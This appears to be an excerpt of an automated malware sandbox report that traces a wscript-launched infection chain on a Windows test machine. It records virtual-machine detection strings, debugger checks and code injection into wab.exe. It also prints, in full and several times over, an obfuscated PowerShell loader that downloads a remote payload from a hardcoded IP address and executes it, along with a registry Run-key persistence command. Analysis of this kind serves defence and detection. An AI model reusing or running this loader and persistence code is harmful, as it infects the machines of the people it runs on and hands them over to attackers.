              Source: wscript.exe, 00000000.00000002.1698914926.0000027B9BFAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceStoppedOKvmicvssvmicvssUnknownUnknownUnknownWin32_ServiceWin32_ComputerSystemJONES-PCvmicvss
              Source: wscript.exe, 00000000.00000003.1696283791.0000027B9E088000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*
              Source: wscript.exe, 00000000.00000003.1681711560.0000027B9BFCC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1698914926.0000027B9BFCC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697847289.0000027B9BFCC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697455730.0000027B9BFCC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1696810979.0000027B9BFCC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1682318964.0000027B9BFCC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697233778.0000027B9BFCC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWr
              Source: wscript.exe, 00000000.00000003.1697957289.0000027B9DEE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1696145143.0000027B9DED5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1696468232.0000027B9DEE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1699596963.0000027B9DEE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceStoppedOKvmicrdvvmicrdvProvides a platform for communication between the virtual machine and the operating system running on the physical computer.Share ProcessManualNormalC:\Windows\system32\svchost.exe -k ICService -pLocalSystemHyper-V Remote Desktop Virtualization ServiceHyper-V Remote Desktop Virtualization ServiceWin32_ServiceWin32_ComputerSystemuser-PCvmicrdvLMEM
              Source: wscript.exe, 00000000.00000003.1697957289.0000027B9DEE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1696145143.0000027B9DED5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1696468232.0000027B9DEE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1699596963.0000027B9DEE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
              Source: wscript.exe, 00000000.00000002.1698914926.0000027B9BFAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicvss
              Source: wscript.exe, 00000000.00000003.1682137616.0000027B9DE13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1681711560.0000027B9BFCC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1698914926.0000027B9BFCC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1695693098.0000027B9DE13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697847289.0000027B9BFCC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697455730.0000027B9BFCC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1696810979.0000027B9BFCC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1699198802.0000027B9DE13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1682318964.0000027B9BFCC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697233778.0000027B9BFCC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1697548908.0000027B9DE13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: wab.exe, 00000009.00000002.2953979686.00000000050F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\n
              Source: wab.exe, 00000009.00000002.2953979686.000000000513E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWl
              Source: wscript.exe, 00000000.00000003.1697548908.0000027B9DE13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceStoppedOKvmicheartbeatvmicheartbeatUnknownUnknownUnknownWin32_ServiceWin32_ComputerSystemJONES-PCvmicheartbeat
              Source: wscript.exe, 00000000.00000003.1697957289.0000027B9DEE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1696145143.0000027B9DED5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1696468232.0000027B9DEE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1699596963.0000027B9DEE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceStoppedOKvmictimesyncvmictimesyncSynchronizes the system time of this virtual machine with the system time of the physical computer.Share ProcessManualNormalC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -pNT AUTHORITY\LocalServiceHyper-V Time Synchronization ServiceHyper-V Time Synchronization ServiceWin32_ServiceWin32_ComputerSystemuser-PCvmictimesyncLMEM
              Source: wscript.exe, 00000000.00000003.1697548908.0000027B9DE13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_044AD41C LdrInitializeThunk,7_2_044AD41C

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4150000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2EBFE54Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bastanteresba = 1;$Excerptet='Substrin';$Excerptet+='g';Function Sughs($Spermophyte68){$Scurf=$Spermophyte68.Length-$Bastanteresba;For($Bastanteres=1; $Bastanteres -lt $Scurf; $Bastanteres+=(2)){$Anglophobes+=$Spermophyte68.$Excerptet.Invoke($Bastanteres, $Bastanteresba);}$Anglophobes;}function Thiocarbamic($Hydrodynamicist){. ($Sterlingkursen) ($Hydrodynamicist);}$udrj=Sughs 'TM oAzMikl lHaT/L5 .S0. (IWTi nPd.oMwOs. ANPT .1 0s.f0 ;. eWViHnD6F4,;c TxT6,4 ;F Dr vM:,1.2 1 .,0,)O eGGeCc,k oA/D2M0S1,0 0A1 0,1C WF i.r.e fHoEx / 1 2A1F. 0 ';$Lobularia=Sughs ',U.s eRr,- A g eDn tS ';$Daybeam=Sughs 'HhWt tLp :F/F/ 8.7a.R1Y2,1E. 1A0U5 .C1S6S3h/.F l y,v,n iCn gKs.. u.3 2D ';$Cololite=Sughs ' >M ';$Sterlingkursen=Sughs 'SiSe,xA ';$Thailndernes = Sughs 'reNchh o. U% a p p dEaGt aE%N\ E y.eMlRiAk.e.0 .aF.o,r H& &D Be cehSoT H$ ';Thiocarbamic (Sughs ' $ g.lTotbBaOlR:kBFaUc tCe,r iUoSp h aEg oRuUs,=N( c,mud, C/.c, V$ TVhHa i lBnIdAeGr nKe sB) ');Thiocarbamic (Sughs ' $ gBl,oSbBa l,:SDFiTaOsbtCeDr eso.i sEoPm eUrH=T$GDMa ySbJeTa.mK. s.p lPiSt,(,$ CUo l oUl iTtCeI)P ');$Daybeam=$Diastereoisomer[0];Thiocarbamic (Sughs ' $.gAlUo b a.lR: NAo.nUz eAbVrLaM=DNPe wF-,O,b,j eMc t HS y.sLtEeSmB.sN e t,.EW e b CslAi.e.nVtF ');Thiocarbamic (Sughs ' $,N o,n.z e.b,rBaB.AHLe aGdAe r sS[ $ LioAbCuTlDa r iRa,]U= $Ou,dbr,jA ');$Nonassigned=Sughs 'VN,oUn z eAb r,a ..DMoSwFn lOo,a dSFSi lIeh(C$ DTa yEb eAa m , $ FHo nRt,eTr.n.eRsD7P2 )B ';$Nonassigned=$Bacteriophagous[1]+$Nonassigned;$Fonternes72=$Bacteriophagous[0];Thiocarbamic (Sughs 'F$ gFlSo.b,a lF:RGAebn.kSo mSsRtReDn,sT=.(.TBe.s t -dPLa tAh J$BFCoSn,tMe r.n epse7 2 ) ');while (!$Genkomstens) {Thiocarbamic (Sughs ' $FgllHoFb,aGl,: F jAosrDt e,nRdMeAd.ealFeF=A$ tLrRu eD ') ;Thiocarbamic $Nonassigned;Thiocarbamic (Sughs ' SPtAa,r.tH- S lUeOe,pP 4P ');Thiocarbamic (Sughs 'V$Sg l oCb,aUl : GSe n k oGmSsPtFe n sA=G( Tke,s,tN-RPSaGtBhA M$ FPo n t,eOrAnteOsD7.2D)k ') ;Thiocarbamic (Sughs ' $Fg l o.bKa,l : SJtUr.aAt e g.iDcWaEl,=S$Mgkl oPbEa,lS: S e rLgCeVa,nNt.s 2,3N+G+ % $ DGiEa.sRt,e,rSemosi sBo,mVehrb. cCo uEnCt ') ;$Daybeam=$Diastereoisomer[$Strategical];}Thiocarbamic (Sughs 'P$,gAlMoNb a l :FPSrBaEeRlUe,c tToBrP S=, IGOeStB-CC o,n t efnBt u$.FDoDnOt evr nDe s.7V2T ');Thiocarbamic (Sughs 'O$ g lDoDbHaLlM:,FLiRjFiaa nOe,r eCs L=U E[ S,y sPt,e.mH.MCAo n,v.e,rDtK] : :SFNr.oDm BKaBsEeP6U4DSpt r isnlgE(C$ PCr aVe l e c.t.onrV) ');Thiocarbamic (Sughs 'C$.gBl,oSbSadl : M,aOe gMb o t, .= p[ASTyGs,t e m..GTDe.x tt.HE,n.cBo dKi nGg ] :U:FAMSCCtI I .GGFe t S.t rAi n gX(.$BF iDjRiCaAnCe.r e sN), ');Thiocarbamic (Sughs 'K$Gg l oMbSa lL: RPe,c,oAnVcPiLl i a tRi,oTn s = $LM aPeFgMb o.t..Bs uDbVsLt rFi nRg (,3,1 8T4 8K6W,s2A4.9T4P2P)A ');Thiocarbamic $Reconciliations;"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Eyelike0.For && echo $"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Bastanteresba = 1;$Excerptet='Substrin';$Excerptet+='g';Function Sughs($Spermophyte68){$Scurf=$Spermophyte68.Length-$Bastanteresba;For($Bastanteres=1; $Bastanteres -lt $Scurf; $Bastanteres+=(2)){$Anglophobes+=$Spermophyte68.$Excerptet.Invoke($Bastanteres, $Bastanteresba);}$Anglophobes;}function Thiocarbamic($Hydrodynamicist){. ($Sterlingkursen) ($Hydrodynamicist);}$udrj=Sughs 'TM oAzMikl lHaT/L5 .S0. (IWTi nPd.oMwOs. ANPT .1 0s.f0 ;. eWViHnD6F4,;c TxT6,4 ;F Dr vM:,1.2 1 .,0,)O eGGeCc,k oA/D2M0S1,0 0A1 0,1C WF i.r.e fHoEx / 1 2A1F. 0 ';$Lobularia=Sughs ',U.s eRr,- A g eDn tS ';$Daybeam=Sughs 'HhWt tLp :F/F/ 8.7a.R1Y2,1E. 1A0U5 .C1S6S3h/.F l y,v,n iCn gKs.. u.3 2D ';$Cololite=Sughs ' >M ';$Sterlingkursen=Sughs 'SiSe,xA ';$Thailndernes = Sughs 'reNchh o. U% a p p dEaGt aE%N\ E y.eMlRiAk.e.0 .aF.o,r H& &D Be cehSoT H$ ';Thiocarbamic (Sughs ' $ g.lTotbBaOlR:kBFaUc tCe,r iUoSp h aEg oRuUs,=N( c,mud, C/.c, V$ TVhHa i lBnIdAeGr nKe sB) ');Thiocarbamic (Sughs ' $ gBl,oSbBa l,:SDFiTaOsbtCeDr eso.i sEoPm eUrH=T$GDMa ySbJeTa.mK. s.p lPiSt,(,$ CUo l oUl iTtCeI)P ');$Daybeam=$Diastereoisomer[0];Thiocarbamic (Sughs ' $.gAlUo b a.lR: NAo.nUz eAbVrLaM=DNPe wF-,O,b,j eMc t HS y.sLtEeSmB.sN e t,.EW e b CslAi.e.nVtF ');Thiocarbamic (Sughs ' $,N o,n.z e.b,rBaB.AHLe aGdAe r sS[ $ LioAbCuTlDa r iRa,]U= $Ou,dbr,jA ');$Nonassigned=Sughs 'VN,oUn z eAb r,a ..DMoSwFn lOo,a dSFSi lIeh(C$ DTa yEb eAa m , $ FHo nRt,eTr.n.eRsD7P2 )B ';$Nonassigned=$Bacteriophagous[1]+$Nonassigned;$Fonternes72=$Bacteriophagous[0];Thiocarbamic (Sughs 'F$ gFlSo.b,a lF:RGAebn.kSo mSsRtReDn,sT=.(.TBe.s t -dPLa tAh J$BFCoSn,tMe r.n epse7 2 ) ');while (!$Genkomstens) {Thiocarbamic (Sughs ' $FgllHoFb,aGl,: F jAosrDt e,nRdMeAd.ealFeF=A$ tLrRu eD ') ;Thiocarbamic $Nonassigned;Thiocarbamic (Sughs ' SPtAa,r.tH- S lUeOe,pP 4P ');Thiocarbamic (Sughs 'V$Sg l oCb,aUl : GSe n k oGmSsPtFe n sA=G( Tke,s,tN-RPSaGtBhA M$ FPo n t,eOrAnteOsD7.2D)k ') ;Thiocarbamic (Sughs ' $Fg l o.bKa,l : SJtUr.aAt e g.iDcWaEl,=S$Mgkl oPbEa,lS: S e rLgCeVa,nNt.s 2,3N+G+ % $ DGiEa.sRt,e,rSemosi sBo,mVehrb. cCo uEnCt ') ;$Daybeam=$Diastereoisomer[$Strategical];}Thiocarbamic (Sughs 'P$,gAlMoNb a l :FPSrBaEeRlUe,c tToBrP S=, IGOeStB-CC o,n t efnBt u$.FDoDnOt evr nDe s.7V2T ');Thiocarbamic (Sughs 'O$ g lDoDbHaLlM:,FLiRjFiaa nOe,r eCs L=U E[ S,y sPt,e.mH.MCAo n,v.e,rDtK] : :SFNr.oDm BKaBsEeP6U4DSpt r isnlgE(C$ PCr aVe l e c.t.onrV) ');Thiocarbamic (Sughs 'C$.gBl,oSbSadl : M,aOe gMb o t, .= p[ASTyGs,t e m..GTDe.x tt.HE,n.cBo dKi nGg ] :U:FAMSCCtI I .GGFe t S.t rAi n gX(.$BF iDjRiCaAnCe.r e sN), ');Thiocarbamic (Sughs 'K$Gg l oMbSa lL: RPe,c,oAnVcPiLl i a tRi,oTn s = $LM aPeFgMb o.t..Bs uDbVsLt rFi nRg (,3,1 8T4 8K6W,s2A4.9T4P2P)A ');Thiocarbamic $Reconciliations;"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Eyelike0.For && echo $"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Calpack" /t REG_EXPAND_SZ /d "%moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Calpack" /t REG_EXPAND_SZ /d "%moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$bastanteresba = 1;$excerptet='substrin';$excerptet+='g';function sughs($spermophyte68){$scurf=$spermophyte68.length-$bastanteresba;for($bastanteres=1; $bastanteres -lt $scurf; $bastanteres+=(2)){$anglophobes+=$spermophyte68.$excerptet.invoke($bastanteres, $bastanteresba);}$anglophobes;}function thiocarbamic($hydrodynamicist){. ($sterlingkursen) ($hydrodynamicist);}$udrj=sughs 'tm oazmikl lhat/l5 .s0. (iwti npd.omwos. anpt .1 0s.f0 ;. ewvihnd6f4,;c txt6,4 ;f dr vm:,1.2 1 .,0,)o eggecc,k oa/d2m0s1,0 0a1 0,1c wf i.r.e fhoex / 1 2a1f. 0 ';$lobularia=sughs ',u.s err,- a g edn ts ';$daybeam=sughs 'hhwt tlp :f/f/ 8.7a.r1y2,1e. 1a0u5 .c1s6s3h/.f l y,v,n icn gks.. u.3 2d ';$cololite=sughs ' >m ';$sterlingkursen=sughs 'sise,xa ';$thailndernes = sughs 'renchh o. u% a p p deagt ae%n\ e y.emlriak.e.0 .af.o,r h& &d be cehsot h$ ';thiocarbamic (sughs ' $ g.ltotbbaolr:kbfauc tce,r iuosp h aeg oruus,=n( c,mud, c/.c, v$ tvhha i lbnidaegr nke sb) ');thiocarbamic (sughs ' $ gbl,osbba l,:sdfitaosbtcedr eso.i seopm eurh=t$gdma ysbjeta.mk. s.p lpist,(,$ cuo l oul ittcei)p ');$daybeam=$diastereoisomer[0];thiocarbamic (sughs ' $.galuo b a.lr: nao.nuz eabvrlam=dnpe wf-,o,b,j emc t hs y.slteesmb.sn e t,.ew e b cslai.e.nvtf ');thiocarbamic (sughs ' $,n o,n.z e.b,rbab.ahle agdae r ss[ $ lioabcutlda r ira,]u= $ou,dbr,ja ');$nonassigned=sughs 'vn,oun z eab r,a ..dmoswfn loo,a dsfsi lieh(c$ dta yeb eaa m , $ fho nrt,etr.n.ersd7p2 )b ';$nonassigned=$bacteriophagous[1]+$nonassigned;$fonternes72=$bacteriophagous[0];thiocarbamic (sughs 'f$ gflso.b,a lf:rgaebn.kso mssrtredn,st=.(.tbe.s t -dpla tah j$bfcosn,tme r.n epse7 2 ) ');while (!$genkomstens) {thiocarbamic (sughs ' $fgllhofb,agl,: f jaosrdt e,nrdmead.ealfef=a$ tlrru ed ') ;thiocarbamic $nonassigned;thiocarbamic (sughs ' sptaa,r.th- s lueoe,pp 4p ');thiocarbamic (sughs 'v$sg l ocb,aul : gse n k ogmssptfe n sa=g( tke,s,tn-rpsagtbha m$ fpo n t,eoranteosd7.2d)k ') ;thiocarbamic (sughs ' $fg l o.bka,l : sjtur.aat e g.idcwael,=s$mgkl opbea,ls: s e rlgceva,nnt.s 2,3n+g+ % $ dgiea.srt,e,rsemosi sbo,mvehrb. cco uenct ') ;$daybeam=$diastereoisomer[$strategical];}thiocarbamic (sughs 'p$,galmonb a l :fpsrbaeerlue,c ttobrp s=, igoestb-cc o,n t efnbt u$.fdodnot evr nde s.7v2t ');thiocarbamic (sughs 'o$ g ldodbhallm:,flirjfiaa noe,r ecs l=u e[ s,y spt,e.mh.mcao n,v.e,rdtk] : :sfnr.odm bkabseep6u4dspt r isnlge(c$ pcr ave l e c.t.onrv) ');thiocarbamic (sughs 'c$.gbl,osbsadl : m,aoe gmb o t, .= p[astygs,t e m..gtde.x tt.he,n.cbo dki ngg ] :u:famsccti i .ggfe t s.t rai n gx(.$bf idjricaance.r e sn), ');thiocarbamic (sughs 'k$gg l ombsa ll: rpe,c,oanvcpill i a tri,otn s = $lm apefgmb o.t..bs udbvslt rfi nrg (,3,1 8t4 8k6w,s2a4.9t4p2p)a ');thiocarbamic $reconciliations;"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$bastanteresba = 1;$excerptet='substrin';$excerptet+='g';function sughs($spermophyte68){$scurf=$spermophyte68.length-$bastanteresba;for($bastanteres=1; $bastanteres -lt $scurf; $bastanteres+=(2)){$anglophobes+=$spermophyte68.$excerptet.invoke($bastanteres, $bastanteresba);}$anglophobes;}function thiocarbamic($hydrodynamicist){. ($sterlingkursen) ($hydrodynamicist);}$udrj=sughs 'tm oazmikl lhat/l5 .s0. (iwti npd.omwos. anpt .1 0s.f0 ;. ewvihnd6f4,;c txt6,4 ;f dr vm:,1.2 1 .,0,)o eggecc,k oa/d2m0s1,0 0a1 0,1c wf i.r.e fhoex / 1 2a1f. 0 ';$lobularia=sughs ',u.s err,- a g edn ts ';$daybeam=sughs 'hhwt tlp :f/f/ 8.7a.r1y2,1e. 1a0u5 .c1s6s3h/.f l y,v,n icn gks.. u.3 2d ';$cololite=sughs ' >m ';$sterlingkursen=sughs 'sise,xa ';$thailndernes = sughs 'renchh o. u% a p p deagt ae%n\ e y.emlriak.e.0 .af.o,r h& &d be cehsot h$ ';thiocarbamic (sughs ' $ g.ltotbbaolr:kbfauc tce,r iuosp h aeg oruus,=n( c,mud, c/.c, v$ tvhha i lbnidaegr nke sb) ');thiocarbamic (sughs ' $ gbl,osbba l,:sdfitaosbtcedr eso.i seopm eurh=t$gdma ysbjeta.mk. s.p lpist,(,$ cuo l oul ittcei)p ');$daybeam=$diastereoisomer[0];thiocarbamic (sughs ' $.galuo b a.lr: nao.nuz eabvrlam=dnpe wf-,o,b,j emc t hs y.slteesmb.sn e t,.ew e b cslai.e.nvtf ');thiocarbamic (sughs ' $,n o,n.z e.b,rbab.ahle agdae r ss[ $ lioabcutlda r ira,]u= $ou,dbr,ja ');$nonassigned=sughs 'vn,oun z eab r,a ..dmoswfn loo,a dsfsi lieh(c$ dta yeb eaa m , $ fho nrt,etr.n.ersd7p2 )b ';$nonassigned=$bacteriophagous[1]+$nonassigned;$fonternes72=$bacteriophagous[0];thiocarbamic (sughs 'f$ gflso.b,a lf:rgaebn.kso mssrtredn,st=.(.tbe.s t -dpla tah j$bfcosn,tme r.n epse7 2 ) ');while (!$genkomstens) {thiocarbamic (sughs ' $fgllhofb,agl,: f jaosrdt e,nrdmead.ealfef=a$ tlrru ed ') ;thiocarbamic $nonassigned;thiocarbamic (sughs ' sptaa,r.th- s lueoe,pp 4p ');thiocarbamic (sughs 'v$sg l ocb,aul : gse n k ogmssptfe n sa=g( tke,s,tn-rpsagtbha m$ fpo n t,eoranteosd7.2d)k ') ;thiocarbamic (sughs ' $fg l o.bka,l : sjtur.aat e g.idcwael,=s$mgkl opbea,ls: s e rlgceva,nnt.s 2,3n+g+ % $ dgiea.srt,e,rsemosi sbo,mvehrb. cco uenct ') ;$daybeam=$diastereoisomer[$strategical];}thiocarbamic (sughs 'p$,galmonb a l :fpsrbaeerlue,c ttobrp s=, igoestb-cc o,n t efnbt u$.fdodnot evr nde s.7v2t ');thiocarbamic (sughs 'o$ g ldodbhallm:,flirjfiaa noe,r ecs l=u e[ s,y spt,e.mh.mcao n,v.e,rdtk] : :sfnr.odm bkabseep6u4dspt r isnlge(c$ pcr ave l e c.t.onrv) ');thiocarbamic (sughs 'c$.gbl,osbsadl : m,aoe gmb o t, .= p[astygs,t e m..gtde.x tt.he,n.cbo dki ngg ] :u:famsccti i .ggfe t s.t rai n gx(.$bf idjricaance.r e sn), ');thiocarbamic (sughs 'k$gg l ombsa ll: rpe,c,oanvcpill i a tri,otn s = $lm apefgmb o.t..bs udbvslt rfi nrg (,3,1 8t4 8k6w,s2a4.9t4p2p)a ');thiocarbamic $reconciliations;"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$bastanteresba = 1;$excerptet='substrin';$excerptet+='g';function sughs($spermophyte68){$scurf=$spermophyte68.length-$bastanteresba;for($bastanteres=1; $bastanteres -lt $scurf; $bastanteres+=(2)){$anglophobes+=$spermophyte68.$excerptet.invoke($bastanteres, $bastanteresba);}$anglophobes;}function thiocarbamic($hydrodynamicist){. ($sterlingkursen) ($hydrodynamicist);}$udrj=sughs 'tm oazmikl lhat/l5 .s0. (iwti npd.omwos. anpt .1 0s.f0 ;. ewvihnd6f4,;c txt6,4 ;f dr vm:,1.2 1 .,0,)o eggecc,k oa/d2m0s1,0 0a1 0,1c wf i.r.e fhoex / 1 2a1f. 0 ';$lobularia=sughs ',u.s err,- a g edn ts ';$daybeam=sughs 'hhwt tlp :f/f/ 8.7a.r1y2,1e. 1a0u5 .c1s6s3h/.f l y,v,n icn gks.. u.3 2d ';$cololite=sughs ' >m ';$sterlingkursen=sughs 'sise,xa ';$thailndernes = sughs 'renchh o. u% a p p deagt ae%n\ e y.emlriak.e.0 .af.o,r h& &d be cehsot h$ ';thiocarbamic (sughs ' $ g.ltotbbaolr:kbfauc tce,r iuosp h aeg oruus,=n( c,mud, c/.c, v$ tvhha i lbnidaegr nke sb) ');thiocarbamic (sughs ' $ gbl,osbba l,:sdfitaosbtcedr eso.i seopm eurh=t$gdma ysbjeta.mk. s.p lpist,(,$ cuo l oul ittcei)p ');$daybeam=$diastereoisomer[0];thiocarbamic (sughs ' $.galuo b a.lr: nao.nuz eabvrlam=dnpe wf-,o,b,j emc t hs y.slteesmb.sn e t,.ew e b cslai.e.nvtf ');thiocarbamic (sughs ' $,n o,n.z e.b,rbab.ahle agdae r ss[ $ lioabcutlda r ira,]u= $ou,dbr,ja ');$nonassigned=sughs 'vn,oun z eab r,a ..dmoswfn loo,a dsfsi lieh(c$ dta yeb eaa m , $ fho nrt,etr.n.ersd7p2 )b ';$nonassigned=$bacteriophagous[1]+$nonassigned;$fonternes72=$bacteriophagous[0];thiocarbamic (sughs 'f$ gflso.b,a lf:rgaebn.kso mssrtredn,st=.(.tbe.s t -dpla tah j$bfcosn,tme r.n epse7 2 ) ');while (!$genkomstens) {thiocarbamic (sughs ' $fgllhofb,agl,: f jaosrdt e,nrdmead.ealfef=a$ tlrru ed ') ;thiocarbamic $nonassigned;thiocarbamic (sughs ' sptaa,r.th- s lueoe,pp 4p ');thiocarbamic (sughs 'v$sg l ocb,aul : gse n k ogmssptfe n sa=g( tke,s,tn-rpsagtbha m$ fpo n t,eoranteosd7.2d)k ') ;thiocarbamic (sughs ' $fg l o.bka,l : sjtur.aat e g.idcwael,=s$mgkl opbea,ls: s e rlgceva,nnt.s 2,3n+g+ % $ dgiea.srt,e,rsemosi sbo,mvehrb. cco uenct ') ;$daybeam=$diastereoisomer[$strategical];}thiocarbamic (sughs 'p$,galmonb a l :fpsrbaeerlue,c ttobrp s=, igoestb-cc o,n t efnbt u$.fdodnot evr nde s.7v2t ');thiocarbamic (sughs 'o$ g ldodbhallm:,flirjfiaa noe,r ecs l=u e[ s,y spt,e.mh.mcao n,v.e,rdtk] : :sfnr.odm bkabseep6u4dspt r isnlge(c$ pcr ave l e c.t.onrv) ');thiocarbamic (sughs 'c$.gbl,osbsadl : m,aoe gmb o t, .= p[astygs,t e m..gtde.x tt.he,n.cbo dki ngg ] :u:famsccti i .ggfe t s.t rai n gx(.$bf idjricaance.r e sn), ');thiocarbamic (sughs 'k$gg l ombsa ll: rpe,c,oanvcpill i a tri,otn s = $lm apefgmb o.t..bs udbvslt rfi nrg (,3,1 8t4 8k6w,s2a4.9t4p2p)a ');thiocarbamic $reconciliations;"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$bastanteresba = 1;$excerptet='substrin';$excerptet+='g';function sughs($spermophyte68){$scurf=$spermophyte68.length-$bastanteresba;for($bastanteres=1; $bastanteres -lt $scurf; $bastanteres+=(2)){$anglophobes+=$spermophyte68.$excerptet.invoke($bastanteres, $bastanteresba);}$anglophobes;}function thiocarbamic($hydrodynamicist){. ($sterlingkursen) ($hydrodynamicist);}$udrj=sughs 'tm oazmikl lhat/l5 .s0. (iwti npd.omwos. anpt .1 0s.f0 ;. ewvihnd6f4,;c txt6,4 ;f dr vm:,1.2 1 .,0,)o eggecc,k oa/d2m0s1,0 0a1 0,1c wf i.r.e fhoex / 1 2a1f. 0 ';$lobularia=sughs ',u.s err,- a g edn ts ';$daybeam=sughs 'hhwt tlp :f/f/ 8.7a.r1y2,1e. 1a0u5 .c1s6s3h/.f l y,v,n icn gks.. u.3 2d ';$cololite=sughs ' >m ';$sterlingkursen=sughs 